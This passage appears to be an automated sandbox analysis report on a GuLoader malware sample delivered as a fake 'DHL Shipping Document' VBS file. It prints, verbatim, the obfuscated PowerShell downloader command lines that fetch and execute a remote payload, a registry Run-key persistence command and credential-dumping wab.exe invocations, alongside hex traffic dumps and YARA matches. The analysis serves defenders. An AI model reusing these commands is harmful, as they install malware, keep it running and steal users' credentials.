7e e8 c7 10 15 b9 a6 41 d5 96 82 49 f0 71 3f d5
                                        Data Ascii: qn\LhJIDf/58?dPSd1l8OY#@=L&tn];5Xfso|nG*2+jJc-$J}Q2YqW2*IRaG|%o^oEr7An\9d>p?\EKxnsbY~AIq?
                                        2024-07-01 14:19:51 UTC8000INData Raw: 28 bb b5 03 b2 81 dd 22 4c d7 0d 76 6e 8c 90 a8 af f6 e7 ae b6 36 2a c6 33 4d c4 05 b8 75 a7 93 aa 12 98 ef fa 74 32 73 29 b6 9d ed b5 da bb b1 01 04 8f d2 90 56 b9 d9 82 48 29 26 8f 9c 16 84 f3 bb 89 5d c4 10 c0 8b 5b 40 ea 6e ce b7 95 ea ff 32 76 6e e9 55 d6 8c 5e 08 1d 45 89 c4 94 22 10 6b 07 fb 0c 43 6a 93 7a 32 f7 87 6f 39 4e f4 1b 87 ba 39 d6 43 0a ab 4e 5c 39 47 a4 22 35 4c e3 79 bc d6 bd 63 60 da 19 8f ea 94 64 6a 05 73 01 b7 48 c1 cb 95 e5 9a 8a ad 56 8c 8c ff 4b 65 3c a4 26 86 40 c7 64 55 1c 86 d2 ad 3e 7e 76 f0 7b 30 63 8a e0 99 96 6d c1 a4 c0 75 cd 17 30 12 cc f0 ab 8d 76 3c 2c 4a 33 88 31 c4 93 76 c4 f4 89 e8 0e fc 88 5f 00 61 6d b5 37 6e a3 be 5d cb fe 0f 2a 1a ea 16 99 e6 4a 3b cd 63 8d 9b 45 1b 64 69 c4 bf 75 a5 c8 fe e1 58 54 db e2 61 58
                                        Data Ascii: ("Lvn6*3Mut2s)VH)&][@n2vnU^E"kCjz2o9N9CN\9G"5Lyc`djsHVKe<&@dU>~v{0cmu0v<,J31v_am7n]*J;cEdiuXTaX
                                        2024-07-01 14:19:51 UTC8000INData Raw: 4f f0 08 01 40 17 b3 1a c0 27 ee 24 3b 92 0d ba fc 98 2d 2c a2 7c 10 3a 95 9c 1e de c2 cb 86 32 78 96 2b c0 fd 6f 21 8d 64 04 69 55 15 2a 80 c6 62 8f cd 6b f2 96 c8 40 85 70 88 3c 1a 8f 31 df f5 3c 4a 3a e9 6a 0c 60 cb 28 e4 9a 8a 1d 91 56 e0 82 ad e2 1b 58 98 e1 0c 59 99 d8 08 0f b1 ec 37 43 8d 7b 55 63 c4 fe fa 91 de d4 c9 a4 63 cf 06 34 b3 68 b0 30 36 81 70 c2 e9 4a a4 57 2a 92 1e be 75 af ca 5a 93 18 68 7e 9a 61 cb c7 f7 cb af 06 25 0d fe a0 12 09 3e f0 9a e6 4a 33 16 28 1c cd 0a 52 8c 6f a7 d6 f7 4d 37 15 eb c6 78 9b ac 60 c4 e8 4d 56 a6 37 0f ac 02 a3 d9 4d 07 93 dd 43 af c4 ba 2f 35 87 a3 58 b5 f4 ae 76 4c 9c 6e e4 a4 f6 e6 d5 ca db 2e 99 e2 d7 9c 4d d2 44 6b 10 fa 6c f4 83 0d e2 34 7b 81 87 b9 3a 77 8c f9 b1 b2 f0 ba 68 a1 82 1e 60 d8 ad 90 35 4a
                                        Data Ascii: O@'$;-,|:2x+o!diU*bk@p<1<J:j`(VXY7C{Ucc4h06pJW*uZh~a%>J3(RoM7x`MV7MC/5XvLn.MDkl4{:wh`5J
                                        2024-07-01 14:19:51 UTC8000INData Raw: d9 be 83 25 63 ff fd c0 fa 8d 47 4d 33 28 94 8f 91 30 35 39 2d a5 9d fe 43 60 b1 e0 05 c4 55 b3 3e 6c 67 e6 f1 c4 4d ec c5 6e 7b 65 98 4a 8f 91 43 23 33 a6 87 70 59 cc 03 a3 e6 14 b3 5c 76 da 10 1c f3 ca 6f fa 8f fd 7d 0e aa 0b 1f 45 a8 ad fa 0c 37 b3 85 94 f3 ae ff 33 a7 e1 96 2e 13 31 62 4c 18 ab 2f 2d 94 f2 77 aa c2 d9 b4 cc 50 5c f4 30 a4 bd c4 91 54 3b d8 f0 ee 48 df 74 35 08 15 ad ab 9e 9e 1a ae d2 7d 07 51 be 3e b1 12 87 87 f2 4e 58 f0 b3 ff af 0b 1c 64 61 90 b9 e0 0e b8 9c ac dc 54 f1 c6 3c da cc 76 82 6a ad b8 8d 46 b0 0e 2d ce e6 91 1c 23 e9 bc 70 e3 55 85 67 bb c1 94 e5 8b f5 f3 b2 53 7d e9 ff bb 86 12 fe 52 3f 45 91 de 0d cf 97 63 98 84 d9 df e0 26 6b e6 41 96 54 48 ef 3a c7 5a 3c 55 0b a2 be 81 6f 18 1d a7 3f 3f 52 c8 a1 e1 73 40 cd 25 2e 1c
                                        Data Ascii: %cGM3(059-C`U>lgMn{eJC#3pY\vo}E73.1bL/-wP\0T;Ht5}Q>NXdaT<vjF-#pUgS}R?Ec&kATH:Z<Uo??Rs@%.
                                        2024-07-01 14:19:51 UTC8000INData Raw: c9 7a c9 52 53 b0 48 26 39 e5 c0 34 8d c6 39 97 8d 1f 37 ab d3 63 7b bf 2f af 58 28 d8 bc 0f 8f 3f 02 e8 52 7a ea 73 05 eb 89 a9 c4 53 39 4f a0 a1 4f c6 b6 a1 db cc 9d 26 f9 96 99 2b 14 86 55 c2 49 18 29 63 05 ba a8 01 44 fa af 88 33 3d 6e 1c e8 f3 d6 52 d4 71 8d 39 5d 0c e3 cc ae d3 28 71 a9 71 71 af c2 b5 e1 6c 29 1c 58 54 75 2c ec 95 e5 fa 98 e2 98 7a 26 ad dd 7f 9e 77 59 b9 97 fd db 35 fc f4 4b 59 4a eb 8d 5d 93 e0 a2 f0 ac c0 ac 06 e8 25 41 ea 87 4b fc a8 38 5a 88 1b e4 71 be 9b 14 cb a7 58 96 bc 55 4d c4 ab f6 88 27 d2 40 b2 d7 88 28 c6 6f 48 a6 a5 4d ee e7 23 8f a9 6c 35 b0 98 95 a6 ba 72 23 ae 96 14 35 74 f7 d3 b7 ec 7e 43 10 fd c1 48 d8 f5 c6 8e 00 52 21 c6 d6 6e ca 7e 2f 52 88 32 9b ed fe ee 1c 8c eb c9 4c 16 cb e1 56 ac 21 d1 04 6a 61 0c a8 b9
                                        Data Ascii: zRSH&9497c{/X(?RzsS9OO&+UI)cD3=nRq9](qqql)XTu,z&wY5KYJ]%AK8ZqXUM'@(oHM#l5r#5t~CHR!n~/R2LV!ja


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:10:19:00
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
                                        Imagebase:0x7ff796e70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:10:19:01
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:10:19:01
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:10:19:04
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
                                        Imagebase:0x7ff6d5690000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:10:19:10
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
                                        Imagebase:0x7a0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:10:19:11
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:10:19:45
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                                        Imagebase:0xa30000
                                        File size:59'392 bytes
                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:10:20:30
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
                                        Imagebase:0xea0000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FF886EEB506 Relevance: .5, Instructions: 474COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e28fb508a451c6c56df15aa58d696bb81cefe55d5e221d01005a6a111306f398
                                          • Instruction ID: d40a27d9e4675e4cd71c9331d0d816bc84b34d1e9b9a3f82a16652c7f30f6062
                                          • Opcode Fuzzy Hash: e28fb508a451c6c56df15aa58d696bb81cefe55d5e221d01005a6a111306f398
                                          • Instruction Fuzzy Hash: 01F1B630918A8E8FEBA8DF28C8557E937E1FF54350F14426ED84DC7691DB38A945CB82
                                          Function 00007FF886EEC2B2 Relevance: .5, Instructions: 459COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48964ed9cff71b0ba873a680c3238e1a8dab2edf1da0316b87def47bd615cae8
                                          • Instruction ID: f36d2f56d7d435ea27c41730df246ef672f81a661f67ae3163e99b54755eb1c9
                                          • Opcode Fuzzy Hash: 48964ed9cff71b0ba873a680c3238e1a8dab2edf1da0316b87def47bd615cae8
                                          • Instruction Fuzzy Hash: 77E1C230908A4E8FEBA8DF28C8557F977E1FB58750F14426AD81DC7291DF78A845CB82
